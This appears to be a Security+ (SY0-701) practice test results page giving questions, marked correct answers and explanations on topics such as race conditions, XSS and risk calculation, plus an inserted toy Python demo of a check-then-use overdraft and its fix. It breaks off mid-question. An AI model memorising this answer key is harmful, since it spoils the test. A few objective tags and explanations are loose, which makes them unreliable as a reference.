CompTIA Security+ (SYO-701) Practice Test 5

https://www.udemy.com/course/comptia-security-sy0-701-practice-tests/learn/quiz/6110330#content

CompTIA Security+ (SYO-701) – Results


Question 1

A medium-sized bank has an online portal where customers may place standing orders and schedule transfers of their funds. A malicious attacker exploits a vulnerability in the application to initiate unauthorized overdrafts. The application verifies the account balance when the transfer is set up but fails to validate and recheck it at the time of execution. What security vulnerability is illustrated by this scenario?

Weak encryption

Explanation

Weak encryption would involve the inadequate protection of sensitive data through encryption algorithms. While encryption is important for securing data, the vulnerability in this scenario is not related to the strength of encryption used in the application.

Input validation

Explanation

Input validation refers to the process of ensuring that data entered into a system meets specific criteria before it is processed. In this scenario, the issue is not related to the validation of user input, but rather the lack of revalidation of account balances at the time of execution.

Correct answer

Race condition

Explanation

A race condition occurs when the outcome of a system’s operation is dependent on the sequence or timing of other uncontrollable events. In this scenario, the lack of revalidation of the account balance at the time of execution creates a race condition where the attacker can exploit the vulnerability to initiate unauthorized overdrafts.

Default settings

Explanation

Default settings typically refer to the pre-configured settings of a system or application. In this case, the vulnerability does not stem from default settings, but rather from the lack of rechecking the account balance at the time of fund transfer execution.

Overall explanation

2.3 Explain various types of vulnerabilities.

The application running on the online portal has a race condition vulnerability. Race conditions may occur when the behavior of a system or application depends on the relative timing of events. The attacker schedules a fund transfer while there is an available balance, then depletes the account before the scheduled transfer executes, exploiting the time gap between the check and the execution. This vulnerability is also known as a time-of-check to time-of-use (TOC-TOU) race condition.

Domain

2.0 Threats, Vulnerabilities, and Mitigations
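The following is an added example, not part of the course material or the bank's application: a toy account and transfer scheduler that reproduce the time-of-check to time-of-use gap described above, next to a version that re-validates the balance atomically at execution time. The class and function names are constructed for illustration.

```python
import threading
from dataclasses import dataclass, field


@dataclass
class Account:
    """Constructed toy account; the lock guards every balance change."""
    balance: int
    lock: threading.Lock = field(default_factory=threading.Lock)


def withdraw(account: Account, amount: int) -> bool:
    """Ordinary withdrawal: check and debit under the same lock."""
    with account.lock:
        if account.balance < amount:
            return False
        account.balance -= amount
        return True


class VulnerableScheduler:
    """Checks the balance only when the transfer is scheduled (time of check)."""

    def __init__(self) -> None:
        self.queue: list[tuple[Account, int]] = []

    def schedule(self, account: Account, amount: int) -> bool:
        if account.balance < amount:          # time of check
            return False
        self.queue.append((account, amount))
        return True

    def execute_all(self) -> list[bool]:
        results = []
        for account, amount in self.queue:    # time of use: no recheck
            account.balance -= amount         # can drive the balance negative
            results.append(True)
        self.queue.clear()
        return results


class SafeScheduler(VulnerableScheduler):
    """Same scheduling step, but the debit re-validates the balance atomically."""

    def execute_all(self) -> list[bool]:
        results = []
        for account, amount in self.queue:
            with account.lock:                # check-and-debit is one critical section
                if account.balance >= amount:
                    account.balance -= amount
                    results.append(True)
                else:
                    results.append(False)     # transfer rejected, no overdraft
        self.queue.clear()
        return results


def demo(scheduler_cls) -> int:
    """Constructed scenario: schedule 80 from a balance of 100, withdraw 70
    before execution, then execute; returns the final balance."""
    acct = Account(balance=100)
    sched = scheduler_cls()
    sched.schedule(acct, 80)        # passes the check: 100 >= 80
    withdraw(acct, 70)              # funds leave the account before execution
    sched.execute_all()
    return acct.balance


if __name__ == "__main__":
    print("vulnerable:", demo(VulnerableScheduler))   # -50, an overdraft
    print("safe:", demo(SafeScheduler))               # 30, transfer rejected
```

The fix is not a second balance check by itself; it is performing the check and the debit inside one critical section at execution time (in a real system, a database transaction with row locking or an atomic conditional update plays the role of the lock).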

Question 2

What should be the primary consideration when approving a business process change in which a new software application will introduce changes to the existing security infrastructure?

To make sure that the changes happen within the timelines

Explanation

While meeting timelines is important for the implementation of a new software application, it is not the primary consideration when approving a business process change that involves changes to the security infrastructure. Security should always take precedence over timelines to prevent potential security risks.

To find a way to reduce the overall budget

Explanation

While budget considerations are important in any business process change, reducing the overall budget should not be the primary focus when approving changes that impact the security infrastructure. Security measures are essential for protecting sensitive data and preventing security breaches.

To facilitate training to all users of the application

Explanation

Providing training to users of the new software application is important for ensuring proper usage and maximizing the benefits of the system. However, facilitating training should not be the primary consideration when approving a business process change that involves security infrastructure changes. Security alignment and compliance should be the main focus in such cases.

Correct answer

There should be alignment with security policies and standards

Explanation

It is crucial to ensure that any business process change aligns with the organization’s security policies and standards to maintain the integrity and confidentiality of data. This helps in preventing security vulnerabilities and ensuring compliance with regulatory requirements.

Overall explanation

1.3 Explain the importance of change management processes and the impact to security.

The primary consideration during the approval stage of a new business process is that there should be alignment with security policies and standards. This helps to maintain the organization’s security posture.

Domain

1.0 General Security Concepts

Question 3

An insurance company has developed a set of guidelines for its employees to follow as they deal with their clients’ subscriptions. Which of the following best describes the aim of having guidelines?

Correct answer

Instructions on how to safeguard the data

Explanation

Guidelines are put in place to provide instructions on how to safeguard sensitive data and ensure that employees handle client subscriptions securely. By following these guidelines, employees can protect the confidentiality, integrity, and availability of the data they work with.

Enforcing penalties for violators

Explanation

While guidelines may include information on penalties for violating security policies, the primary aim of having guidelines is not to enforce penalties. The main focus is on providing clear instructions and best practices for employees to follow in order to maintain security.

Framework for securing the organization

Explanation

Guidelines serve as a framework for securing the organization by outlining the necessary steps and procedures to protect data and prevent security incidents. They provide a structured approach to implementing security measures and ensuring compliance with security standards.

Delegation of security responsibilities

Explanation

Guidelines do not necessarily involve the delegation of security responsibilities. Instead, they provide employees with the knowledge and tools they need to fulfill their security responsibilities effectively. Delegation of security responsibilities may be addressed through organizational roles and responsibilities, but guidelines focus on providing guidance and best practices.

Overall explanation

5.1 Summarize elements of effective security governance.

Guidelines can provide the employees of the insurance company with instructions on how to safeguard the data. Guidelines are created typically to give the employees practical and clear instructions on the ways they should handle sensitive data to maintain security.

Domain

5.0 Security Program Management and Oversight

Question 4

The security team has recently noticed an increase in false positives that is impacting the efficiency of the intrusion detection system that monitors the network for security threats. What can they consider implementing to improve the accuracy of the device?

Correct answer

Anomaly detection and behavior analysis

Explanation

Implementing anomaly detection and behavior analysis can significantly improve the accuracy of the intrusion detection system by focusing on deviations from normal patterns. This approach can help in distinguishing between legitimate network activity and potential security threats, thereby reducing false positives and enhancing overall detection capabilities.

Reducing the number of devices being monitored

Explanation

Reducing the number of devices being monitored could potentially lessen the burden on the intrusion detection system, but it may not necessarily improve the accuracy in terms of reducing false positives. Limiting the scope of monitoring may lead to overlooking potential threats on other devices.

Adding a span port to the traffic path

Explanation

Adding a span port to the traffic path can enhance visibility into network traffic, but it may not directly solve the problem of false positives. While it can provide more data for analysis, it does not inherently address the root cause of the accuracy issues in the intrusion detection system.

Daily searching for new signatures

Explanation

Daily searching for new signatures may help in keeping the intrusion detection system up-to-date with the latest threats, but it may not directly address the issue of false positives. While it is important for threat intelligence, it may not be the most effective solution for reducing false alarms.

Overall explanation

4.5 Given a scenario, modify enterprise capabilities to enhance security.

To improve the accuracy of their intrusion detection system, the security team can implement anomaly detection and behavior analysis. With this method, abnormal activity that does not match a known or defined signature can still be detected, which helps reduce false positives.

Domain

4.0 Security Operations

Question 5

A large e-commerce website has turned to load balancing to help absorb recent surges in traffic during holiday sales. What do they expect from the load-balancing setup?

To block malicious traffic entering the network

Explanation

While load balancing can help mitigate DDoS attacks by distributing traffic across multiple servers, its primary function is not to block malicious traffic entering the network. This is typically handled by other security measures such as firewalls and intrusion detection systems.

To monitor the performance of the incoming traffic

Explanation

Monitoring the performance of incoming traffic is not the primary function of load balancing. While load balancers can provide some performance metrics, their main role is to evenly distribute traffic across servers to optimize resource utilization and improve user experience.

Correct answer

To distribute incoming traffic evenly across multiple web servers

Explanation

The main goal of a load-balancing setup is to distribute incoming traffic evenly across multiple web servers. This helps improve the website’s performance, scalability, and availability by preventing any single server from becoming overwhelmed with traffic.

To authenticate the packets as they enter the network

Explanation

Load balancing is not responsible for authenticating packets as they enter the network. Its main purpose is to evenly distribute incoming traffic across multiple servers to improve performance and reliability.

Overall explanation

3.4 Explain the importance of resilience and recovery in security architecture.

The large e-commerce website expects to distribute incoming traffic evenly across multiple web servers from the load-balancing setup. The configuration enhances the performance of the server and ensures high availability by preventing an overloading of resources on a single server.

Domain

3.0 Security Architecture

Question 6

The security manager at a corporate institution is responsible for the vendor selection process to provide cybersecurity training for the employees. What action should the security manager take once he discovers that his uncle is one of the vendors being considered for the job?

Reject participating in the vendor selection process without any explanations

Explanation

Rejecting participation in the vendor selection process without any explanations may raise suspicions and questions about the security manager’s motives. Transparency and honesty are crucial in such situations to maintain the integrity of the selection process.

Proceed with the vendor selection process without disclosing the relationship

Explanation

Proceeding with the vendor selection process without disclosing the relationship with the vendor may lead to conflicts of interest and bias in the decision-making process. It is essential to disclose any personal relationships that may influence the selection to ensure fairness and impartiality.

Make sure that his uncle is the selected vendor because they are family

Explanation

Selecting the vendor based on a family relationship without considering other factors such as qualifications, expertise, and cost-effectiveness may not be in the best interest of the corporate institution. It is important to prioritize the organization’s cybersecurity needs and choose the most suitable vendor based on merit.

Correct answer

Disclose the relationship to the vendor selection committee

Explanation

Disclosing the relationship to the vendor selection committee is the most appropriate course of action in this scenario. Transparency about the personal connection with the vendor allows the committee to assess the situation objectively and make an informed decision based on all relevant factors. This helps to maintain the integrity of the selection process and avoid any conflicts of interest.

Overall explanation

5.3 Explain the processes associated with third-party risk assessment and management.

The security manager should disclose the relationship to the vendor selection committee. The current situation involves a conflict of interest, and it is therefore necessary to observe proper ethical conduct, transparency, and fairness to protect the integrity of the vendor selection process.

Domain

5.0 Security Program Management and Oversight

Question 7

Employees at a company have received phone calls from individuals claiming to be technical support staff, requesting usernames and passwords for critical security upgrades tied to individual user accounts. What type of social engineering attack are they being subjected to?

Instashing

Explanation

Instashing is not a recognized term in the context of social engineering attacks. It does not relate to the scenario described where individuals are being targeted through phone calls to obtain usernames and passwords for security upgrades.

Correct answer

Vishing

Explanation

Vishing, or voice phishing, is a type of social engineering attack where attackers use phone calls to trick individuals into providing sensitive information such as usernames and passwords. In this scenario, the employees are being targeted through phone calls by individuals claiming to be technical support staff, making it a classic example of a vishing attack.

Smishing

Explanation

Smishing is a type of phishing attack that involves sending text messages to trick individuals into revealing sensitive information. While similar to vishing, smishing specifically refers to attacks conducted through SMS or text messages, not phone calls as described in the scenario.

Spear phishing

Explanation

Spear phishing is a type of phishing attack that targets specific individuals or organizations with personalized messages to trick them into revealing sensitive information such as usernames and passwords. While similar to the scenario described, spear phishing typically involves email communication rather than phone calls.

Overall explanation

2.2 Explain common threat vectors and attack surfaces.

The employees at the company are being subjected to a vishing social engineering attack. Vishing stands for voice phishing. The attackers have resorted to voice communications in their attempt to socially engineer their way into receiving the usernames and passwords of users at the company.

Domain

2.0 Threats, Vulnerabilities, and Mitigations

Question 8

A small-sized business venture has opted to use a self-signed SSL certificate due to budget constraints to secure the traffic between its web server and clients. What is the major security concern for such a decision?

Reduced key strength for the encryption

Explanation

Using a self-signed SSL certificate does not necessarily mean reduced key strength for encryption. The key strength is determined by the encryption algorithm and key length chosen during the certificate generation process, which can still be strong even with a self-signed certificate.

Correct answer

An increased risk of man-in-the-middle attacks

Explanation

The major security concern with using a self-signed SSL certificate is the increased risk of man-in-the-middle attacks. Since self-signed certificates are not verified by a trusted third-party certificate authority, attackers can potentially intercept and modify the communication between the web server and clients without detection.

Certificate errors on the browser causing doubts

Explanation

While certificate errors on the browser may occur when using a self-signed SSL certificate, causing doubts for users, this is not the major security concern. Users can still choose to proceed with the connection despite the certificate warning.

Increased volume of traffic

Explanation

Using a self-signed SSL certificate does not directly impact the volume of traffic. The concern lies more in the security of the communication channel rather than the amount of traffic being transmitted.

Overall explanation

1.4 Explain the importance of using appropriate cryptographic solutions.

The major security concern for the business venture using a self-signed SSL certificate is an increased risk of man-in-the-middle attacks. Since the certificate has not been verified by a trusted third party, any attacker could likewise forge and use their own unverified certificate. Although it provides encryption, it does not have the validation and trust provided by a recognized certificate authority (CA).

Domain

1.0 General Security Concepts

Question 9

A cloud storage service provider is assessing the financial impact of a security breach that leads to the theft of stored customer data. They have estimated the cost of such a breach to be $1 million and the probability that such a breach could occur within a period of a year to be 10%. What is the ALE?

$10 million

Explanation

The Annual Loss Expectancy (ALE) is not ten times the cost of the breach. It is the $1 million cost multiplied by the 10% probability, resulting in $100,000, not $10 million.

Correct answer

$100,000

Explanation

The correct calculation for the Annual Loss Expectancy (ALE) in this scenario is $1 million cost multiplied by 10% probability, resulting in $100,000. This is the accurate estimation of the financial impact of the security breach.

$1 million

Explanation

The Annual Loss Expectancy (ALE) is not equal to the cost of the security breach. It is the product of the cost of the breach and the probability of it occurring within a year. In this case, the ALE is $100,000, not $1 million.

$10,000

Explanation

The Annual Loss Expectancy (ALE) is a crucial metric in risk assessment that combines the potential financial impact of a security breach with the likelihood of it happening. In this case, multiplying the $1 million cost of the breach by the 10% probability results in an ALE of $100,000.

Overall explanation

5.2 Explain elements of the risk management process.

The annualized loss expectancy (ALE) is $100,000. The annualized loss expectancy is the product of the single loss expectancy (SLE), i.e., $1 million, and the annualized rate of occurrence (ARO), i.e., 10%.

ALE = SLE x ARO = $1,000,000 x 0.10 = $100,000

Domain

5.0 Security Program Management and Oversight

Question 10

A malicious user has injected a script into the comment section of a vulnerable web application that allows users to post their comments on a blog. When the comment is viewed on the blog by other users, it executes unauthorized activity on the browser of the viewer. What vulnerability is the website susceptible to?

XSRF

Explanation

XSRF (Cross-Site Request Forgery) vulnerability involves tricking a user into performing unintended actions on a web application where they are authenticated. It does not directly relate to injecting scripts into web applications to execute unauthorized activities on browsers.

SSRF

Explanation

SSRF (Server-Side Request Forgery) vulnerability allows attackers to make requests from the server to other resources on the internet, potentially leading to unauthorized access to internal systems or sensitive data. It is not directly related to injecting scripts into web applications to execute unauthorized activities on browsers.

XXE

Explanation

XXE (XML External Entity) vulnerability is related to parsing XML input from untrusted sources, allowing attackers to access sensitive data or execute arbitrary code. It is not directly related to injecting scripts into web applications to execute unauthorized activities on browsers.

Correct answer

XSS

Explanation

XSS (Cross-Site Scripting) vulnerability occurs when an attacker injects malicious scripts into web applications, which are then executed on the browsers of other users. This vulnerability allows attackers to steal sensitive information, manipulate website content, or perform unauthorized actions on behalf of the user.

Overall explanation

2.3 Explain various types of vulnerabilities.

The website is affected by a cross-site scripting (XSS) vulnerability. The weakness allows untrusted data to be included in the webpage due to a lack of proper input handling, which in turn allows the attacker to execute harmful scripts in the application in the context of other users.

Domain

2.0 Threats, Vulnerabilities, and Mitigations

Question 11

What is the most relevant security consideration for a manufacturing company utilizing embedded systems to control its critical processes such as temperature and pressure regulation?

Real-time threat detection using antivirus software

Explanation

Real-time threat detection using antivirus software is essential for protecting against malware and other malicious software, but it may not be the most relevant security consideration for embedded systems in a manufacturing company where firmware vulnerabilities can pose a greater risk.

Correct answer

Patching vulnerabilities affecting the system’s firmware

Explanation

Patching vulnerabilities affecting the system’s firmware is the most relevant security consideration for a manufacturing company utilizing embedded systems to control critical processes. Firmware vulnerabilities can be exploited by attackers to gain unauthorized access or disrupt operations, making timely patching essential for maintaining the security of the systems.

Physically securing the equipment housing the embedded systems

Explanation

Physically securing the equipment housing the embedded systems is a crucial security consideration for a manufacturing company as it helps prevent unauthorized physical access to the systems, which can lead to tampering or sabotage of critical processes.

Monitoring network traffic using an intrusion detection system

Explanation

Monitoring network traffic using an intrusion detection system is important for overall network security, but it may not directly address the security considerations specific to embedded systems controlling critical processes in a manufacturing environment.

Overall explanation

4.6 Given a scenario, implement and maintain identity and access management.

The most relevant security consideration for the embedded systems being utilized is patching vulnerabilities affecting the system’s firmware. The updates should be applied regularly to continuously provide protection against known security issues.

Domain

4.0 Security Operations

Question 12

What type of test can an organization perform to validate that their critical web application can maintain service availability in the event normal service operation is interrupted?

Simulation

Explanation

Simulation involves creating a virtual environment to mimic real-world scenarios and test the behavior of systems and applications. While simulation can be useful for testing various aspects of a web application, it may not accurately reflect the actual performance and availability of the application during an interruption of normal service operation.

Tabletop exercises

Explanation

Tabletop exercises are used to simulate various scenarios and test the organization’s response to them. While they are valuable for testing incident response and decision-making processes, they do not directly validate the ability of a critical web application to maintain service availability in the event of an interruption.

Parallel processing

Explanation

Parallel processing involves breaking down tasks into smaller subtasks that can be executed simultaneously to improve performance. While parallel processing can enhance the efficiency of processing tasks, it is not directly related to testing the ability of a critical web application to maintain service availability during interruptions in normal service operation.

Correct answer

Fail-over

Explanation

Fail-over testing is specifically designed to validate the ability of a critical web application to maintain service availability in the event normal service operation is interrupted. This type of test involves intentionally triggering a failure or interruption and verifying that the application can seamlessly switch to a backup system or component to continue providing service.

Overall explanation

3.4 Explain the importance of resilience and recovery in security architecture.

The organization can perform a fail-over test to validate that service availability can be maintained by its critical web application when normal service operations are interrupted. This helps the organization to ensure the continuity and resilience of its operations by confirming the system’s ability to provide uninterrupted services.

Domain

3.0 Security Architecture

Question 13

During a severe winter storm, a data center experienced a sudden power outage. How does a UPS serve the data center in such a situation?

Correct answer

Protects critical equipment from power disruptions

Explanation

This choice is correct because the main purpose of a UPS is to protect critical equipment from power disruptions. A UPS acts as a buffer between the main power source and the equipment, providing a continuous power supply during outages or fluctuations to prevent data loss or damage to hardware.

Automatically switch on the backup generators

Explanation

Automatically switching on backup generators is not the primary function of a UPS (Uninterruptible Power Supply). While some data centers may have this setup, the main purpose of a UPS is to provide temporary power to critical equipment during power outages or disruptions until the generators kick in.

Alert administrators of the power outage

Explanation

Alerting administrators of a power outage is not a direct function of a UPS. While some UPS systems may have monitoring capabilities to send alerts, the primary role of a UPS is to ensure uninterrupted power supply to critical equipment, rather than notifying administrators of power issues.

Distribute the power evenly through the data center

Explanation

Distributing power evenly through the data center is not the primary function of a UPS. While a UPS helps regulate power and prevent disruptions, its main purpose is to provide a temporary power source during outages, rather than managing power distribution within the data center.

Overall explanation

3.4 Explain the importance of resilience and recovery in security architecture.

An uninterruptible power supply (UPS) protects critical equipment from power disruptions. UPS units can provide battery power temporarily to keep critical equipment up and running during unexpected power outages, allowing a safe and orderly transition to a generator or a similar backup source. They close the gap between the power outage and the startup of the backup power supplies.

Domain

3.0 Security Architecture

Question 14

Why should a multinational corporation implement geographic restrictions in its data security policies as it operates across borders and regions?

Reduction of data transfer costs across borders

Explanation

Implementing geographic restrictions in data security policies may not necessarily reduce data transfer costs across borders. While it may indirectly impact data transfer by limiting where data can be accessed from, the primary purpose of geographic restrictions is not cost reduction.

Correct answer

Compliance with varying data protection regulations

Explanation

Implementing geographic restrictions in data security policies is crucial for multinational corporations to comply with varying data protection regulations across different borders and regions. By restricting data access based on geographic locations, organizations can ensure compliance with local laws and regulations regarding data privacy and security.

Improvement in the network speed and performance

Explanation

Implementing geographic restrictions in data security policies may not directly improve network speed and performance. While it may impact network traffic by limiting access to certain regions, the main goal of geographic restrictions is not focused on network optimization.

Limiting the access to the sensitive data

Explanation

Implementing geographic restrictions in data security policies is essential for limiting access to sensitive data based on geographical locations. By restricting access to sensitive information to specific regions, organizations can reduce the risk of unauthorized access and data breaches.

Overall explanation

3.3 Compare and contrast concepts and strategies to protect data.

A multinational corporation should implement geographic restrictions in its data security policies to ensure compliance with varying data protection regulations. Such regulations state how the data should be stored and transmitted, the required strength of encryption, who is allowed to access the data, processing standards, and so on.

Domain

3.0 Security Architecture

Question 15

A cybersecurity technician has noticed abnormal login patterns consisting of multiple failed login attempts against several user accounts from different source IP addresses. How does a SIEM system help the technician?

Triggering of an immediate incident response action

Explanation

Triggering of an immediate incident response action is not a direct function of a SIEM system. A SIEM system can help detect and alert on potential security incidents, but the actual incident response actions would need to be initiated by the cybersecurity team based on the information provided by the SIEM.

Correct answer

Log analysis and generation of alerts

Explanation

Log analysis and generation of alerts is a key function of a SIEM system. A SIEM system collects and analyzes log data from various sources, including failed login attempts, to identify potential security incidents. By generating alerts based on abnormal patterns, the system helps the cybersecurity technician identify and respond to potential threats in a timely manner.

Automatically blocking suspicious IP addresses

Explanation

Automatically blocking suspicious IP addresses is not a direct function of a SIEM system. While a SIEM system can help detect and analyze abnormal login patterns, the actual blocking of IP addresses would typically be handled by a firewall or other security control.

Perform user account verification and validation

Explanation

Performing user account verification and validation is not a primary function of a SIEM system. While a SIEM system can help monitor user activity and detect abnormal patterns, the verification and validation of user accounts would typically be handled by identity and access management systems.

Overall explanation

4.4 Explain security alerting and monitoring concepts and tools.

Log analysis and generation of alerts are achieved by the security information and event management (SIEM) system. The SIEM primarily performs the aggregation and correlation of security logs. It is capable of recognizing abnormal patterns from the log data such as multiple failed login attempts and can notify the cybersecurity team of potential security incidents via alerts.

Domain

4.0 Security Operations

Question 16Skipped

A business firm has experienced a data breach causing them to activate their incident response plan. What is the role of incident response policies in this situation?

To prevent an incident from happening in the future

Explanation

Incident response policies are reactive measures that help organizations respond to security incidents after they have occurred. They are not intended to prevent incidents from happening in the future. Prevention measures are typically addressed through proactive security measures and policies.

To find out who is to blame for the incident

Explanation

While it may be important to identify the root cause of a security incident, incident response policies are primarily focused on containing and mitigating the incident, rather than assigning blame to individuals or departments within the organization.

Correct answer

To restore normal operations and reduce the impact of the incident

Explanation

Incident response policies are put in place to guide the organization in effectively responding to and recovering from security incidents. The primary goal of these policies is to restore normal operations as quickly as possible and minimize the impact of the incident on the business.

To be able to present legal documents to authorities when questioned

Explanation

Incident response policies are not designed to provide legal documentation or evidence to authorities. While incident response plans may include steps for reporting incidents to appropriate authorities, their main purpose is to guide the organization in responding to and recovering from security incidents.

Overall explanation

5.1 Summarize elements of effective security governance.

The role of the incident response policies is to restore normal operations and reduce the impact of the incident. They provide a structured framework for how the organization should respond, manage, and recover from the security incidents such as data breaches.

Domain

5.0 Security Program Management and Oversight

Question 17Skipped

A company is obliged to retain its customers’ data for a minimum of three years as per the new governing regulations. What is the purpose of a data retention policy for this company?

To reduce the costs of storage

Explanation

A data retention policy is not primarily designed to reduce the costs of storage. While it may indirectly impact storage costs by defining what data needs to be retained and for how long, the main purpose is to ensure compliance with regulations and protect customer data privacy.

To ensure that data is always deleted

Explanation

The purpose of a data retention policy is not to ensure that data is always deleted. On the contrary, it specifies how long data should be retained to comply with regulations and legal requirements. Deleting data without following the policy could lead to non-compliance issues.

To create laws for data collection

Explanation

A data retention policy is not about creating laws for data collection. It is about setting guidelines within the organization on how long data should be kept, how it should be stored, and when it should be securely disposed of. Compliance with existing regulations is the main focus.

Correct answer

To comply with regulations and ensure privacy

Explanation

The correct choice. A data retention policy is essential for companies to comply with regulations and ensure the privacy of customer data. By defining how long data should be retained, who has access to it, and how it should be securely disposed of, the company can avoid legal penalties and protect sensitive information.

Overall explanation

4.2 Explain the security implications of proper hardware, software, and data asset management.

The data retention policy is used by the company to comply with regulations and ensure privacy by defining how long the data should be retained. Clear guidelines of the way the organization should manage and retain its data over time are established by the policy.

Domain

4.0 Security Operations

Question 18Skipped

A security administrator has initiated an investigation on a workstation that is suspected to be compromised after observing unusual network behavior originating from it. What action should be taken?

Initiate a full backup of the data in the workstation

Explanation

Although backups are important, initiating one during an active investigation could inadvertently capture malware or other malicious elements along with legitimate data. Additionally, it could alter or overwrite important forensic data, making it difficult to analyze the compromise. The focus should first be on isolating the threat and conducting a forensic analysis before considering backup options.

Disconnect the workstation from the network

Explanation

While disconnecting the workstation can effectively stop suspicious activity, it also eliminates the ability to monitor real-time behavior and network traffic, which may be essential for forensic analysis. Sudden disconnection may alert the attacker that the workstation has been identified, potentially prompting them to delete logs or further obscure their activity. It is a more abrupt measure compared to quarantine, which allows for a more systematic investigation.

Reset the workstation to factory settings

Explanation

Resetting the workstation should be a last resort after the investigation is complete. While this action would remove any malware or unauthorized access, it also destroys crucial forensic evidence that may be needed to understand the nature of the compromise, how it occurred, and its full scope. Prematurely wiping the system could prevent identifying other infected systems or the attack vector.

Correct answer

Place the workstation in a quarantine network segment

Explanation

Quarantining the workstation by placing it in a separate network segment helps to isolate the threat while maintaining connectivity for further investigation. This approach prevents the spread of malware or unauthorized access across the broader network, while still allowing investigators to monitor and collect data for analysis. It is a controlled method of containment that minimizes disruption to the overall environment and avoids the risk of tampering with evidence.

Overall explanation

4.4 Explain security alerting and monitoring concepts and tools.

The security administrator should place the workstation in a quarantine network segment. Isolating the device from the rest of the network in the quarantine prevents malware and other threats from spreading across the network while the investigation continues.

Domain

4.0 Security Operations

Question 19Skipped

An attacker has managed to exploit a vulnerability on one of the virtual machines in an organization employing virtualization technology due to the virtual machine having an outdated and unpatched operating system. What is the most pressing security risk in this scenario?

Persistent access to the affected virtual machine

Explanation

Persistent access to the affected virtual machine is a security risk, but it is not as critical as the risk of unauthorized access to the hypervisor. While persistent access can lead to further exploitation and data exfiltration, unauthorized access to the hypervisor poses a more immediate and widespread threat to the organization’s virtual environment.

Disruption of services running on the compromised virtual machine

Explanation

While the disruption of services running on the compromised virtual machine is a concern, it is not as critical as the risk of unauthorized access to the hypervisor. Disruption of services can be mitigated by isolating the affected virtual machine, but unauthorized access to the hypervisor poses a much larger threat.

Correct answer

Unauthorized access to the hypervisor

Explanation

The most pressing security risk in this scenario is the unauthorized access to the hypervisor. If an attacker gains access to the hypervisor, they can potentially compromise all virtual machines running on the host, leading to a widespread security breach within the organization.

Compromised data within the affected virtual machine

Explanation

Compromised data within the affected virtual machine is a significant concern, but it is not the most pressing security risk in this scenario. Data within the virtual machine can potentially be recovered or restored, whereas unauthorized access to the hypervisor can lead to more severe consequences for the entire virtual environment.

Overall explanation

2.3 Explain various types of vulnerabilities.

The most pressing security risk is unauthorized access to the hypervisor. Through a successful virtual machine escape, an attacker can compromise the hypervisor layer that controls all the virtual machines on the physical server. Such a breach puts every virtual machine and the physical host at risk of exploitation.

Domain

2.0 Threats, Vulnerabilities, and Mitigations

Question 20Skipped

A security specialist has deployed honeytokens in a server’s file system to help detect unauthorized access to sensitive data. Which of the following best illustrates what a honeytoken is?

A security token generator to create passwords

Explanation

A security token generator is a tool used to create secure authentication tokens or passwords for users. While this tool enhances security, it is not the same as a honeytoken, which is used as a deception technique to detect unauthorized access.

Correct answer

Fictitious data entry designed to trigger alerts

Explanation

A honeytoken is a type of fictitious data entry or file that is intentionally placed in a system to act as a decoy for potential attackers. When unauthorized access occurs and the honeytoken is accessed, it triggers an alert, indicating a security breach.

Network traffic captured by a sniffing tool

Explanation

Network traffic captured by a sniffing tool is related to network monitoring and analysis, not honeytokens. Honeytokens are specifically designed to detect unauthorized access to sensitive data by acting as bait for attackers, triggering alerts when accessed.

One time session tokens to determine session hijacks

Explanation

One-time session tokens are used to authenticate and authorize users for a single session or transaction. They are not related to honeytokens, which are specifically designed to detect unauthorized access by acting as bait for attackers.

Overall explanation

1.2 Summarize fundamental security concepts.

A honeytoken is a fictitious data entry designed to trigger alerts. Honeytokens are deliberately placed to detect unauthorized access or data breaches and so provide a way to spot attackers on the network. Any attempt to access a honeytoken triggers an alert and indicates that a potential security incident has occurred.

Domain

1.0 General Security Concepts

Question 21Skipped

Which of the following options best represents a physical security control for a technology firm interested in upgrading the access controls to their data center?

Encrypting the data on the access control server

Explanation

Encrypting the data on the access control server is a data security measure rather than a physical control. Data encryption protects the confidentiality of information stored on the server, but it does not directly address physical access to the data center itself.

Updating the data center access control policies

Explanation

Updating the data center access control policies is a procedural security measure rather than a physical control. While important for overall security, access control policies dictate who can access the data center and under what conditions, but they do not physically restrict access.

Correct answer

Fingerprint scanners at the entrance

Explanation

Fingerprint scanners at the entrance are a physical security control measure that can restrict access to the data center based on biometric identification. This control ensures that only authorized individuals with registered fingerprints can enter the data center, enhancing overall security.

Installing antivirus software on the access control server

Explanation

Installing antivirus software on the access control server is a cybersecurity measure rather than a physical security control. Antivirus software is designed to detect and remove malware from systems, but it does not directly address physical access to the data center.

Overall explanation

1.1 Compare and contrast various types of security controls.

Fingerprint scanners at the entrance best represent a physical security control for a technology firm interested in upgrading the access controls to their data center. Physical security controls are designed to protect physical assets such as buildings, data centers, and infrastructure from unauthorized access, theft, or vandalism.

Domain

1.0 General Security Concepts

Question 22Skipped

Which protocol should be implemented to ensure the confidentiality and integrity of email communication?

SSH

Explanation

SSH (Secure Shell) is a network protocol that provides secure access to a remote system. While SSH is commonly used for secure remote access and file transfers, it is not specifically designed for securing email communication. TLS (Transport Layer Security) is the more appropriate protocol for ensuring the confidentiality and integrity of email communication.

SNMP

Explanation

SNMP (Simple Network Management Protocol) is used for network management and monitoring, and it is not designed to ensure the confidentiality and integrity of email communication. SNMP is used for collecting and organizing information about devices on a network, not for securing email communications.

Correct answer

TLS

Explanation

TLS (Transport Layer Security) is the correct choice for ensuring the confidentiality and integrity of email communication. TLS is a cryptographic protocol that encrypts data transmitted over a network, providing secure communication channels for email services. By implementing TLS, email communication can be protected from eavesdropping and tampering.

FTP

Explanation

FTP (File Transfer Protocol) is not the correct choice for ensuring the confidentiality and integrity of email communication. FTP is primarily used for transferring files between a client and a server, and it does not provide encryption or security features for email communication.

Overall explanation

4.1 Given a scenario, apply common security techniques to computing resources.

Transport layer security (TLS) should be implemented to ensure the confidentiality and integrity of email communication. TLS uses certificates to encrypt the communications, making it practically impossible for an attacker positioned between the sender and the receiver to make any sense of the data without the receiver’s private key, which is kept safe and secured at the receiver’s end.

Domain

4.0 Security Operations

Question 23Skipped

Which of the following measures best aligns with national privacy requirements aimed at improving data security and safeguarding the citizens’ personal information?

Correct answer

Encrypting the data at rest and in transit

Explanation

Encrypting data at rest and in transit is a measure that directly aligns with national privacy requirements aimed at improving data security and safeguarding citizens’ personal information. Encryption helps protect data from unauthorized access and ensures that sensitive information remains confidential.

Selling the data to generate income to purchase security tools

Explanation

Selling data to generate income for purchasing security tools may be a valid business strategy, but it does not directly align with national privacy requirements aimed at improving data security and safeguarding citizens’ personal information. Selling data may compromise privacy and security.

Sharing the data with foreign allies to strengthen relationships

Explanation

